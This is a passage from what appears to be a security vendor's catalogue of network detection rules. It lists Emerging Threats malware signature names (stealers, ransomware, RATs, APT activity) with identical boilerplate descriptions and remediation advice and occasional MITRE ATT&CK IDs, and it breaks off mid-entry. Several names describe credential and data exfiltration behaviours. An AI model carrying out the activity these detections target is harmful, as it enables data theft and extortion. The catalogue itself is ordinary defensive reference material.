This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoderVir Stealer Zip Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoinMiner Performing System Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE MSIL/Document Stealer Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/EasyLocker Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Eredel Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G1 Stealer/GravityRAT Requesting Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G1 Stealer/GravityRAT Uploading File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/G2 Stealer/GravityRAT CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GenKryptik.FQRH Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GravityRAT CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/GX Stealer/GravityRAT Uploading File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/HadesLocker Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Heracles Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Hidden-Tear Variant Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Injector.VVP Downloader Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Juliens Botnet CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Karmen Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/KeyRedirEx Banker Receiving Exit Instruction

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/KeyRedirEx Banker Receiving Redirect/Inject List

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/KeyRedirEx Banker Requesting Redirect/Inject List

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Khonsri Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL.Kraken.v2 HTTP Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer IP Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer Screenshot Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.L4L Stealer Systeminfo Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Lordix Stealer Exfiltrating Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Matrix Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Matrix Ransomware Sending Encrypted Filelist

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Monitor.PCTattletale.A Checkin (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/n2019cov (COVID-19) Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NewHT Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NoCry Ransomware Checkin Via Discord

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/NR42 Bot Parsing Config From Webpage

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/PSW.Agent.QJK Stealer Data Exfil Via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Runsome Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/SamMiner CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SamMiner CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/SkidRat User-Agent Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Small.FU Variant CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Spy.Banker.DH Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Spy.Keylogger.ENJ Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.KUO CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Agent.KUO CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/TrojanDownloader.Small.CLJ CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Unk.HT-Based Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL.Zapchast Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MS Office Macro Dridex Download URI Jan 7 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater alt checkin to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater Connectivity Check to Google

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSUpdater POST checkin to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater APT Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload - CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Registering with CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Requesting Command from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Sending Command Output to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MuddyWater Payload Sending Screenshot to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Murlo Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MUROFET/Licat Trojan

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mustang Panda/RedDelta Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mustang Panda/RedDelta Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mutter Backdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Load Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Load Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Posting Host Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Stats Callout Aug 18 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MWI Maldoc Stats Callout Oct 28

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MyKings Bootloader Variant Requesting Payload M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MZRevenge Ransomware CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Naoinstalad Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nebuler/Dialer.qn HTTP Request - Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemty Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Nemty Ransomware Payment Page ID File Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Nemucod Downloading Payload 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemucod JS Downloader Aug 01 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nemucod JS Downloader June 12 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NetBackdoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NetBackdoor User-Agent (.net backdoor)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Program Wrapper Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Proxy Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce Proxy User-Agent (idk)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Netbounce User-Agent (Netbounce)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Neverquest Request URI Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Neverquest/Vawtrak Posting Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NEWPASS CnC Client Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings Data Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NewPosThings POST with Fake UA and Accept Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nexus Stealer CnC Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NightfallGT Discord Nitro Ransomware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE NightfallGT Discord Token Grabber

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NightfallGT Mercurial Grabber

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nitlove POS CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Nitro Stealer Exfil Activity (Response)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM - Cobalt Strike Malleable Profile M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE NOBELIUM - Cobalt Strike Malleable Profile M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM (TA421) EnvyScout Fingerprint Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE NOBELIUM Win32/VaporRage Loader CnC Checkin

Description
Copy link

